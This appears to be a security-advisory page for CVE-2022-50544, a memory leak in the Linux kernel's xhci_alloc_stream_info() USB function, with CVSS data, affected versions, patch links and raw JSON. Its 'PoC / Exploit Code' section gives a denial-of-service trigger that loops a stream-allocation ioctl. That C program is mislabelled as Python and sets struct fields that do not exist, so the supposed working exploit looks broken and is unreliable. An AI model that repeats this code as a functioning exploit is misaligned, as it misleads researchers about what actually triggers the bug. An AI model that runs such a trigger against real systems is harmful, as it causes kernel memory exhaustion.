Security Vulnerability Report
中文
CVE-2022-50544 CVSS 5.5 MEDIUM

CVE-2022-50544

Published: 2025-10-07 16:15:39
Last Modified: 2026-02-26 23:17:08
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: usb: host: xhci: Fix potential memory leak in xhci_alloc_stream_info() xhci_alloc_stream_info() allocates stream context array for stream_info ->stream_ctx_array with xhci_alloc_stream_ctx(). When some error occurs, stream_info->stream_ctx_array is not released, which will lead to a memory leak. We can fix it by releasing the stream_info->stream_ctx_array with xhci_free_stream_ctx() on the error path to avoid the potential memory leak.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.10.150 (stable分支修复)
Linux Kernel < 5.15.75 (stable分支修复)
Linux Kernel < 5.19.17 (stable分支修复)
Linux Kernel < 6.0.3 (stable分支修复)
所有引入xhci_alloc_stream_info()函数至修复版本之间的Linux内核版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2022-50544: Trigger memory leak in xhci_alloc_stream_info() // This PoC demonstrates how to trigger the memory leak by repeatedly // attempting to allocate USB streams and forcing error conditions. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #include <sys/ioctl.h> #include <linux/usbdevice_fs.h> // Simplified trigger: open a USB device and attempt stream allocation // operations that may fail, causing the memory leak path to be exercised. int trigger_memory_leak(const char *usb_device_path) { int fd; int ret; int iteration = 0; fd = open(usb_device_path, O_RDWR); if (fd < 0) { perror("Failed to open USB device"); return -1; } // Repeatedly attempt operations that trigger xhci_alloc_stream_info() // In a real exploit, the attacker would need to: // 1. Have a USB device that supports bulk streams // 2. Issue USBDEVFS_ALLOCSTREAM or equivalent ioctl calls // 3. Force failures in the allocation path (e.g., via resource exhaustion) while (iteration < 1000) { struct usbdevfs_streams streams; // Attempt to allocate streams - this calls into xhci_alloc_stream_info() streams.urb_count = 1; // Minimal stream count streams.streams = 0; ret = ioctl(fd, USBDEVFS_ALLOCSTREAMS, &streams); if (ret < 0 && errno != EBUSY) { // Error path triggered - memory leak occurs here fprintf(stderr, "Iteration %d: ioctl failed (expected for PoC): %s\n", iteration, strerror(errno)); } iteration++; } close(fd); printf("PoC completed. Check kernel memory usage for leaks.\n"); return 0; } int main(int argc, char *argv[]) { const char *dev_path = "/dev/bus/usb/001/001"; if (argc > 1) { dev_path = argv[1]; } printf("CVE-2022-50544 PoC - xhci memory leak trigger\n"); printf("Target device: %s\n", dev_path); printf("WARNING: Run as root with a USB device that supports bulk streams\n\n"); return trigger_memory_leak(dev_path); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50544", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:38.823", "lastModified": "2026-02-26T23:17:08.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: host: xhci: Fix potential memory leak in xhci_alloc_stream_info()\n\nxhci_alloc_stream_info() allocates stream context array for stream_info\n->stream_ctx_array with xhci_alloc_stream_ctx(). When some error occurs,\nstream_info->stream_ctx_array is not released, which will lead to a\nmemory leak.\n\nWe can fix it by releasing the stream_info->stream_ctx_array with\nxhci_free_stream_ctx() on the error path to avoid the potential memory\nleak."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.35", "versionEndExcluding": "4.9.331", "matchCriteriaId": "D68E43FC-1611-40E9-9B72-C951CB0E0707"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.296", "matchCriteriaId": "1927ABC6-E0D2-478F-B103-B982A42D1158"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.262", "matchCriteriaId": "D6B62970-1FAD-4ED6-930A-23E26A8D2E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.220", "matchCriteriaId": "125F7133-B3B7-4175-8CF3-FF0845483254"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.150", "matchCriteriaId": "C495821C-2A71-4F09-BED8-6A6EB4C9BA27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/782c873f8e7686f5b3c47e8b099f7e08c3dd1fdc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7e271f42a5cc3768cd2622b929ba66859ae21f97", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7fc6bab3413e6a42bb1264ff7c9149808c93a4c7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/91271a3e772e180bbb8afb114c72fd294a02f93d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9fa81cbd2dd300aa8fe9bac70e068b9a11cbb144", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a40ad475236022f3432880e3091c380e46e71a71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ddab9fe76296840aad686c66888a9c1dfdbff5ff", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e702de2f5c893bf2cdb0152191f99a6ad1411823", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fcd594da0b5955119d9707e4e0a8d0fb1c969101", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.